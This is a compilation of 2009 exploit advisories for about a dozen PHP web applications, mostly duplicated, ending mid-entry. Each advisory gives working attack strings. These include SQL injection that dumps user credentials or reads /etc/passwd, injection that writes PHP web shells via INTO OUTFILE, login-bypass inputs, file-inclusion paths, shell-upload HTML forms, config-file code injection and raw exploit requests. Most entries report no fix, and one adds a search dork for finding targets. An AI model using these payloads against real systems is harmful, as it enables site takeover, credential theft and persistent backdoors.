LightOpenCMS 0.1 pre-alpha Remote SQL Injection
Salvatore drosophila Fresta
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***
[+] Menu
1) Bugs
2) Code
3) Fix
***
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query(SELECT * FROM pages WHERE
id='.$_GET['id'].');
return mysql_fetch_assoc($result);
...
***
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23
***
[+] Fix
No fix.
***
--
Salvatore Fresta aka drosophila
CWNP444351
Salvatore drosophila Fresta
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***
[+] Menu
1) Bugs
2) Code
3) Fix
***
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query(SELECT * FROM pages WHERE
id='.$_GET['id'].');
return mysql_fetch_assoc($result);
...
***
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23
***
[+] Fix
No fix.
***
Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Pragyan CMS [+] Version: 2.6.4 [+] Website: http://www.pragyan.org [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 22 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Risk: hight [-] Requisites: magic_quotes_gpc = off/on This web application is entirely vulnerable to SQL Injection because any variable is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/?action=viewfileget=-1' UNION ALL SELECT 'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23 * [+] Fix You must sanitise any user input. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Pragyan CMS [+] Version: 2.6.4 [+] Website: http://www.pragyan.org [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 22 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Risk: hight [-] Requisites: magic_quotes_gpc = off/on This web application is entirely vulnerable to SQL Injection because any variable is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/?action=viewfileget=-1' UNION ALL SELECT 'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23 * [+] Fix You must sanitise any user input. *
Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta ***
[+] Application: Multi-lingual E-Commerce System
[+] Version: 0.2
[+] Website: http://sourceforge.net/projects/mlecsphp/
[+] Bugs: [A] Local File Inclusion
[B] Information Disclosure
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 19 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Local File Inclusion
[-] Risk: hight
[-] File affected: index.php
This bug allows a guest to include local files.
The following is the vulnerable code:
...
if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];}
...
?
include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php');
?
...
- [B] Information Disclosure
[-] Risk: medium
[-] File affected: database.inc
This file contains reserved informations such as
the username and the password for connecting to
the database. Using .inc extension only, the
content is visible.
- [C] Arbitrary File Upload
[-] Risk: medium
[-] File affected: product_image.php
In the admin directory there are no files that
check if the user has admin privileges. For this
reason a guest can execute the files contained in
this directory. product_image.php contains a form
that allows to upload files on the system but
does not contain functions that check the files
extensions, however a user can upload arbitrary
files.
*
[+] Code
- [A] Local File Inclusion
http://www.site.com/path/index.php?page=../../../../../etc/passwd
*** Salvatore drosophila Fresta ***
[+] Application: Multi-lingual E-Commerce System
[+] Version: 0.2
[+] Website: http://sourceforge.net/projects/mlecsphp/
[+] Bugs: [A] Local File Inclusion
[B] Information Disclosure
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 19 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Local File Inclusion
[-] Risk: hight
[-] File affected: index.php
This bug allows a guest to include local files.
The following is the vulnerable code:
...
if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];}
...
?
include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php');
?
...
- [B] Information Disclosure
[-] Risk: medium
[-] File affected: database.inc
This file contains reserved informations such as
the username and the password for connecting to
the database. Using .inc extension only, the
content is visible.
- [C] Arbitrary File Upload
[-] Risk: medium
[-] File affected: product_image.php
In the admin directory there are no files that
check if the user has admin privileges. For this
reason a guest can execute the files contained in
this directory. product_image.php contains a form
that allows to upload files on the system but
does not contain functions that check the files
extensions, however a user can upload arbitrary
files.
*
[+] Code
- [A] Local File Inclusion
http://www.site.com/path/index.php?page=../../../../../etc/passwd�%00
http://www.site.com/path/index.php?lang=/../../../../../../etc/passwd�%00
- [B] Information Disclosure
http://www.site.com/path/admin/inc/database.inc
- [C] Arbitrary File Upload
html
head
titleMulti-lingual E-Commerce System 0.2 Arbitrary File Upload
Exploit/title
/head
body
form enctype=multipart/form-data
action=http://site/path/admin/product_image.php; method=POST
label for=productValid product ID:/labelbr
input type=text name=product value=1br
label for=file_nameEvil file name:/labelbr
input type=text name=file_name value=/shell.phpbr
label for=userfileFile:/label
input name=userfile type=file
input type=hidden name=file_pathbrbr
input type=submit value=Upload
/form
/body
/html
*
[+] Fix
No fix.
*
Creasito e-commerce content manager Authentication Bypass
*** Salvatore drosophila Fresta *** [+] Application: creasito e-commerce content manager [+] Version: 1.3.16 [+] Website: http://creasito.bloghosteria.com [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 20 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs This cms is entirely vulnerable to SQL Injection. I decided to post authentication bypass security flaw only. - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: admin/checkuser.php, checkuser.php SQL Injection bug allows a guest to bypass the authentication system. The following is the vulnerable code: ... $username = $_POST['username']; ... $sql = mysql_query(SELECT * FROM amministratore WHERE username='$username' AND password='$password' AND activated='1'); ... * [+] Code - [A] Authentication Bypass Username: -1' OR '1'='1'# Password: foo * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: creasito e-commerce content manager [+] Version: 1.3.16 [+] Website: http://creasito.bloghosteria.com [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 20 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs This cms is entirely vulnerable to SQL Injection. I decided to post authentication bypass security flaw only. - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: admin/checkuser.php, checkuser.php SQL Injection bug allows a guest to bypass the authentication system. The following is the vulnerable code: ... $username = $_POST['username']; ... $sql = mysql_query(SELECT * FROM amministratore WHERE username='$username' AND password='$password' AND activated='1'); ... * [+] Code - [A] Authentication Bypass Username: -1' OR '1'='1'# Password: foo * [+] Fix No fix. *
Tiny Blogr 1.0.0 rc4 Authentication Bypass
*** Salvatore drosophila Fresta *** [+] Application: Tiny Blogr [+] Version: 1.0.0 rc4 [+] Website: http://tinyblogr.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 17 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: class.eport.php This bug allows a guest to bypass the authentication system. * [+] Code - [A] Authenticaion Bypass Username: admin'# Password: foo * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Tiny Blogr [+] Version: 1.0.0 rc4 [+] Website: http://tinyblogr.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 17 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: class.eport.php This bug allows a guest to bypass the authentication system. * [+] Code - [A] Authenticaion Bypass Username: admin'# Password: foo * [+] Fix No fix. *
Malleo 1.2.3 Local File Inclusion Vulnerability
*** Salvatore drosophila Fresta ***
[+] Application: Malleo
[+] Version: 1.2.3
[+] Website: http://www.malleo-cms.com
[+] Bugs: [A] Local File Inclusion
[+] Exploitation: Remote
[+] Date: 17 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Local File Inclusion
[-] Risk: low
[-] File affected: admin.php
This bug allows a privileged user to include local
files. I decided to publish this bug for reporting
security flaw only. The following is the vulnerable
code:
...
$module = (isset($_GET['module']))?
$_GET['module']:$cf-config['default_module_admin'];
...
}else{
// Mise a jour de la date d'activite de la session fondateur
if ($cf-config['activer_digicode']) $_SESSION['digicode_TTL'] = time();
if (file_exists($root.$module))
{
include_once($root.$module);
...
*
[+] Code
- [A] Local File Inclusion
http://www.site.com/path/admin.php?module=../../../../../etc/passwd
*
[+] Fix
No fix.
*
--
Salvatore drosophila Fresta
CWNP444351
*** Salvatore drosophila Fresta ***
[+] Application: Malleo
[+] Version: 1.2.3
[+] Website: http://www.malleo-cms.com
[+] Bugs: [A] Local File Inclusion
[+] Exploitation: Remote
[+] Date: 17 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Local File Inclusion
[-] Risk: low
[-] File affected: admin.php
This bug allows a privileged user to include local
files. I decided to publish this bug for reporting
security flaw only. The following is the vulnerable
code:
...
$module = (isset($_GET['module']))?
$_GET['module']:$cf-config['default_module_admin'];
...
}else{
// Mise a jour de la date d'activite de la session fondateur
if ($cf-config['activer_digicode']) $_SESSION['digicode_TTL'] = time();
if (file_exists($root.$module))
{
include_once($root.$module);
...
*
[+] Code
- [A] Local File Inclusion
http://www.site.com/path/admin.php?module=../../../../../etc/passwd
*
[+] Fix
No fix.
*
PHP-agenda = 2.2.5 Remote File Overwriting
*** Salvatore drosophila Fresta *** [+] Application: PHP-agenda [+] Version: = 2.2.5 [+] Website: http://php-agenda.sourceforge.net [+] Bugs: [A] Remote File Overwriting [+] Exploitation: Remote [+] Date: 10 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Remote File Overwriting [-] Risk: hight [-] File affected: install.php This bug allows a guest to overwrite config.inc.php inserting PHP code. * [+] Code - [A] Remote File Overwriting html headPHP-agenda = 2.2.5 - Remote File Overwriting/head body form action=http://www.site.com/path/install.php; method=post input type=text name=dbhost size=30 value='; system($_GET['cmd']); echo ' input type=submit value=Exploit! /form /body /head To execute commands: http://www.site.com/path/config.inc.php?cmd=uname -a * [+] Fix You must delete install.php after installation. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: PHP-agenda [+] Version: = 2.2.5 [+] Website: http://php-agenda.sourceforge.net [+] Bugs: [A] Remote File Overwriting [+] Exploitation: Remote [+] Date: 10 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Remote File Overwriting [-] Risk: hight [-] File affected: install.php This bug allows a guest to overwrite config.inc.php inserting PHP code. * [+] Code - [A] Remote File Overwriting html headPHP-agenda = 2.2.5 - Remote File Overwriting/head body form action=http://www.site.com/path/install.php; method=post input type=text name=dbhost size=30 value='; system($_GET['cmd']); echo ' input type=submit value=Exploit! /form /body /head To execute commands: http://www.site.com/path/config.inc.php?cmd=uname -a * [+] Fix You must delete install.php after installation. *
Loggix Project 9.4.5 Blind SQL Injection
*** Salvatore drosophila Fresta *** [+] Application: Loggix Project [+] Version: 9.4.5 [+] Website: http://loggix.gotdns.org [+] Bugs: [A] Blind SQL Injection [+] Exploitation: Remote [+] Date: 10 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: modules/comment/post.php This bug allows a guest to execute arbitrary queries. * [+] Code - [A] Blind SQL Injection POST /path/modules/comment/post.php HTTP/1.1\r\n Host: site\r\n Keep-Alive: 300\r\n Connection: keep-alive\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 177\r\n \r\n title=titlecomment=commentuser_name=useruser_pass=passwordparent_key=keyrefer_id=-1' UNION ALL SELECT '?php system($_GET['cmd']); ?' INTO OUTFILE '/var/www/htdocs/rce.php * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Loggix Project [+] Version: 9.4.5 [+] Website: http://loggix.gotdns.org [+] Bugs: [A] Blind SQL Injection [+] Exploitation: Remote [+] Date: 10 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: modules/comment/post.php This bug allows a guest to execute arbitrary queries. * [+] Code - [A] Blind SQL Injection POST /path/modules/comment/post.php HTTP/1.1\r\n Host: site\r\n Keep-Alive: 300\r\n Connection: keep-alive\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 177\r\n \r\n title=titlecomment=commentuser_name=useruser_pass=passwordparent_key=keyrefer_id=-1' UNION ALL SELECT '?php system($_GET['cmd']); ?' INTO OUTFILE '/var/www/htdocs/rce.php * [+] Fix No fix. *
Dynamic Flash Forum 1.0 Beta Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Dynamic Flash Forum [+] Version: 1.0 Beta [+] Website: http://df2.sourceforge.net/ [+] Bugs: [A] Information Disclosure [B] Authentication Bypass [C] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 09 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Information Disclosure [-] File affected: config.inc This file contains reserved informations such as the username and the password for connecting to the database. Using .inc extension only, the content is visible. - [B] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass the authentication system and to login with administrator privileges. - [C] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewprofile.php, viewmessage.php, viewthreads.php This bug allows a guest to execute arbitrary queries. * [+] Code - [A] Information Disclosure http://www.site.com/path/config.inc - [B] Authentication Bypass Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23 Password: password - [C] Multiple SQL Injection http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23 http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL FROM users%23 http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)) FROM users%23 * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Dynamic Flash Forum [+] Version: 1.0 Beta [+] Website: http://df2.sourceforge.net/ [+] Bugs: [A] Information Disclosure [B] Authentication Bypass [C] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 09 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Information Disclosure [-] File affected: config.inc This file contains reserved informations such as the username and the password for connecting to the database. Using .inc extension only, the content is visible. - [B] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass the authentication system and to login with administrator privileges. - [C] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewprofile.php, viewmessage.php, viewthreads.php This bug allows a guest to execute arbitrary queries. * [+] Code - [A] Information Disclosure http://www.site.com/path/config.inc - [B] Authentication Bypass Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23 Password: password - [C] Multiple SQL Injection http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23 http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL FROM users%23 http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)) FROM users%23 * [+] Fix No fix. *
AdaptBB 1.0 Beta Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta ***
[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/
[+] Bugs: [A] Multiple Blind SQL Injection
[B] Multiple Dynamic Code Execution
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Multiple Blind SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary SQL
queries.
- [B] Multiple Dynamic Code Execution
[-] Risk: hight
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary php
code.
...
if ($_GET['box']) {
$folder = $_GET['box'];
}
...
$ddata[] = ucwords($folder);
...
eval ( ? .str_replace($cdata, $ddata,
stripslashes(template($view._header))). ?php );
...
- [C] Arbitrary File Upload
[-] Risk: hight
[-] File affected: attach.php
This bug allows a registered user to upload
arbitrary files and to execute them from
inc/attachments directory. This is possible
because there are no controls on file extension
on the server side but only on the client side.
*
[+] Code
- [A] Multiple Blind SQL Injection
http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=profileuser=blablabox=-1' UNION ALL
SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=messagesuser=blablabox=-1' UNION ALL
SELECT '?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=edit_postid=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8,9 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
To execute commands:
http://site/path/rce.php?cmd=uname -a
- [B] Multiple Dynamic Code Execution
http://www.site.com/path/index.php?do=profileuser=blablabox=?php
echo pre; system('ls'); echo /pre?
http://www.site.com/path/index.php?do=messagesuser=blablabox=?php
echo pre; system('ls'); echo /pre?
*
[+] Fix
To fix them you must check the input properly.
However is not recommended to store your real
username and password in the cookies.
*
--
Salvatore drosophila Fresta
CWNP444351
*** Salvatore drosophila Fresta ***
[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/
[+] Bugs: [A] Multiple Blind SQL Injection
[B] Multiple Dynamic Code Execution
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Multiple Blind SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary SQL
queries.
- [B] Multiple Dynamic Code Execution
[-] Risk: hight
[-] File affected: almost all of the files are
vulnerable
This bug allows a guest to execute arbitrary php
code.
...
if ($_GET['box']) {
$folder = $_GET['box'];
}
...
$ddata[] = ucwords($folder);
...
eval ( ? .str_replace($cdata, $ddata,
stripslashes(template($view._header))). ?php );
...
- [C] Arbitrary File Upload
[-] Risk: hight
[-] File affected: attach.php
This bug allows a registered user to upload
arbitrary files and to execute them from
inc/attachments directory. This is possible
because there are no controls on file extension
on the server side but only on the client side.
*
[+] Code
- [A] Multiple Blind SQL Injection
http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=profileuser=blablabox=-1' UNION ALL SELECT
'?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=messagesuser=blablabox=-1' UNION ALL SELECT
'?php system($_GET[cmd])%3b ?',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=edit_postid=-1' UNION ALL SELECT '?php
system($_GET[cmd])%3b ?',2,3,4,5,6,7,8,9
Joomla Component com_bookjoomlas SQL Injection Vulnerability
*** Salvatore drosophila Fresta *** [+] Application: Joomla Component com_bookjoomlas [+] Version: 0.1 [+] Website: http://www.alikonweb.it [+] Bugs: [A] SQL Injection [+] Exploitation: Remote [+] Dork: inurl:index.php?option=com_bookjoomlas [+] Date: 06 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] Security risk: low [-] File affected: sub_commententry.php This bug allows a privileged user to view username and password of a registered user. Like all SELECT vulnerable queries, this can be manipulate to write files on system. * [+] Code - [A] SQL Injection http://www.site.com/path/index.php?option=com_bookjoomlasItemid=26func=commentgbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Joomla Component com_bookjoomlas [+] Version: 0.1 [+] Website: http://www.alikonweb.it [+] Bugs: [A] SQL Injection [+] Exploitation: Remote [+] Dork: inurl:index.php?option=com_bookjoomlas [+] Date: 06 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] Security risk: low [-] File affected: sub_commententry.php This bug allows a privileged user to view username and password of a registered user. Like all SELECT vulnerable queries, this can be manipulate to write files on system. * [+] Code - [A] SQL Injection http://www.site.com/path/index.php?option=com_bookjoomlasItemid=26func=commentgbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users * [+] Fix No fix. *
Family Connections 1.8.2 Arbitrary File Upload
*** Salvatore drosophila Fresta ***
[+] Application: Family Connection
[+] Version: = 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 3 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Arbitrary File Upload
[-] Files affected: documents.php inc/documents_class.php
This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.
...
if (isset($_POST['submitadd'])) {
$doc = $_FILES['doc']['name'];
$desc = addslashes($_POST['desc']);
if
($docs-uploadDocument($_FILES['doc']['type'],
$_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {
...
function uploadDocument ($filetype, $filename, $filetmpname) {
global $LANG;
$known_photo_types = array('application/msword' = 'doc',
'text/plain' = 'txt', 'application/excel' = 'xsl',
'application/vnd.ms-excel' = 'xsl', 'application/x-msexcel' = 'xsl',
'application/x-compressed' = 'zip',
'application/x-zip-compressed'
= 'zip', 'application/zip' = 'zip', 'multipart/x-zip' = 'zip',
'application/rtf' = 'rtf',
'application/x-rtf' = 'rtf', 'text/richtext' = 'rtf',
'application/mspowerpoint' = 'ppt', 'application/powerpoint' =
'ppt', 'application/vnd.ms-powerpoint' = 'ppt',
'application/x-mspowerpoint' = 'ppt',
'application/x-excel' =
'xsl', 'application/pdf' = 'pdf');
if (!array_key_exists($filetype, $known_photo_types)) {
echo p
class=\error-alert\.$LANG['err_not_doc1']. $filetype
.$LANG['err_not_doc2'].br/.$LANG['err_not_doc3']./p;
return false;
} else {
copy($filetmpname, gallery/documents/$filename);
return true;
}
}
...
*
[+] Code
- [A] Arbitrary File Upload
The following is an example of a malicious package:
POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name=doc; filename=file.php\r\n
Content-Type: text/plain\r\n
\r\n
?php echo This is not a text file?\r\n
--AaB03x\r\n
Content-Disposition: form-data; name=desc\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name=submitadd\r\n
\r\n
Submit\r\n
--AaB03x--\r\n
*
[+] Fix
No fix.
*
--
Salvatore drosophila Fresta
CWNP444351
*** Salvatore drosophila Fresta ***
[+] Application: Family Connection
[+] Version: = 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 3 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Arbitrary File Upload
[-] Files affected: documents.php inc/documents_class.php
This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.
...
if (isset($_POST['submitadd'])) {
